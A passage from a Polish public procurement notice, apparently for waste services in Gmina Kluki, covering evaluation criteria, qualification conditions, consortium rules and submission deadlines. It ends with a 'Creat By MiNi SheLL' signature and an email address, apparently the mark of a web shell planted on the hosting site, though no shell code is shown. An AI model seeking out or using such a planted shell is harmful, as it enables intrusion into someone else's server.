Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>7.W przypadku braku zgody, o której mowa w ust. 6, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody<br/>do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba, że zachodzą przesłanki do unieważnienia<br/>postępowania.<br/>8.Jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o<br/>podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i<br/>usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami. Wykonawca, składając ofertę, informuje zamawiającego, czy<br/>wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego, wskazując nazwę (rodzaj) towaru lub<br/>usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania, oraz wskazując ich wartość bez kwoty podatku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów:<br/>Wykonawca zobowiązany jest posiadać wpis w rejestrze bazy danych o produktach (BDO), w dziale XII z zaznaczoną<br/>klauzulą: „Prowadzę działalność w zakresie obiektów liniowych<br/>w rozumieniu art.3 pkt 3 ustawy z dnia 7 lipca 1994 r. – Prawo budowlane Dz.U. z 2019 r. poz.1202, z późn. zm.),<br/>działalność w zakresie usług o których mowa w art.3 ust.1 pkt 32 ustawy z dnia 14 grudnia 2012 r. o odpadach*” i<br/>zaznaczoną odpowiedzią „TAK” oraz miejscem prowadzenia działalności na terenie Gminy Kluki lub na terenie całego kraju<br/>z wpisanym kodem odpadu: 190899 (kod z charakterystyki odpadu).<br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, uznaje się za<br/>spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia<br/>do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do<br/>których realizacji te uprawnienia są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu<br/>potwierdzenia spełniania warunku udziału w postępowaniu, o których mowa w rozdziale VIII ust. 2 pkt 2) SWZ Zamawiający żąda na<br/>wezwanie, złożenia:<br/>Oświadczenia wykonawcy o posiadaniu wpisu w rejestrze bazy danych o produktach (BDO), w dziale XII z zaznaczoną klauzulą:<br/>„Prowadzę działalność w zakresie obiektów liniowych w rozumieniu art.3 pkt 3 ustawy z dnia 7 lipca 1994 r. – Prawo budowlane<br/>Dz.U. z 2019 r. poz.1202, z późn. zm.), działalność w zakresie usług o których mowa w art.3 ust.1 pkt 32 ustawy z dnia 14 grudnia<br/>2012 r. o odpadach*” i zaznaczoną odpowiedzią „TAK” oraz miejscem prowadzenia działalności na terenie Gminy Kluki lub na<br/>terenie całego kraju z wpisanym kodem odpadu: 190899 (kod z charakterystyki odpadu), (według wzoru stanowiącego Załącznik nr 6<br/>do SWZ).<br/>Szczegółowe informacje zostały zawarte w rozdz.X SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia wykonawcy z udziału w postępowaniu, o których mowa w rozdziale IX ust. 1 i ust. 3 SWZ Zamawiający<br/>żąda na wezwanie, złożenia:<br/>Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania, wskazanych przez Zamawiającego, o których mowa w Rozdziale IX SWZ oraz art.<br/>108 ust. 1 ustawy Pzp i w art. 109 ust. 1 pkt 4, 5, 7 ustawy Pzp, (według wzoru stanowiącego Załącznik nr 5 do SWZ).<br/>Uwaga:<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Szczegółowe informacje zostały zawarte w rozdz.X SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, która<br/>część zamówienia zostanie wykonana przez poszczególnych wykonawców. Przedmiotowe oświadczenie zawiera załącznik<br/>nr 2a do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>5. W przypadku złożenia oferty przez konsorcjum należy wymienić firmy wchodzące w jego skład oraz wskazać Lidera<br/>Konsorcjum.<br/>6. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>8. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający zażąda<br/>przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje dokonanie zmian postanowień treści zawartej umowy w przypadku zaistnienia okoliczności<br/>wskazanych w §13 Projektowanych postanowieniach umowy, stanowiących Załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-21 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com